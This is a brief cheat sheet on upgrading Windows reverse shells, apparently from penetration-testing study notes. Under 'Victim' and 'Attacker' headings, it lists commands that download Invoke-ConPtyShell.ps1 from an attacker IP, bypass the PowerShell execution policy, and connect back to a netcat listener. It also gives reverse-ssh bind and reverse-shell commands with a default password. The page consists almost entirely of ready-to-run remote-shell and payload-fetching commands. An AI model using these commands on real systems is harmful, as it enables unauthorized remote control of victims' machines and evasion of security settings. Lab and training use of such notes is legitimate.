🪟Windows Shell Upgrades

ContPtyShell

#ContPtyShell

Victim

Invoke-WebRequest -Uri http://192.168.45.159:8080/Invoke-ConPtyShell.ps1 -OutFile .\Invoke-ConPtyShell.ps1

Set-ExecutionPolicy Bypass -Scope Process -Force

. .\Invoke-ConPtyShell.ps1

Invoke-ConPtyShell 192.168.45.159 3001

Attacker

stty raw -echo; (stty size; cat) | rlwrap nc -lvnp 3001

Reverse-SSH

#Reverse-SSH

Bind method

Victim

./reverse-ssh

Attacker (default password: letmeinbrudipls)

ssh -p 31337 <RHOST>

Reverse shell method

1- Attacker

reverse-ssh -v -l -p 31337

2- Victim

.\reverse-ssh.exe -p 31337 192.168.45.182

3- Attacker

ssh -p 8888 127.0.0.1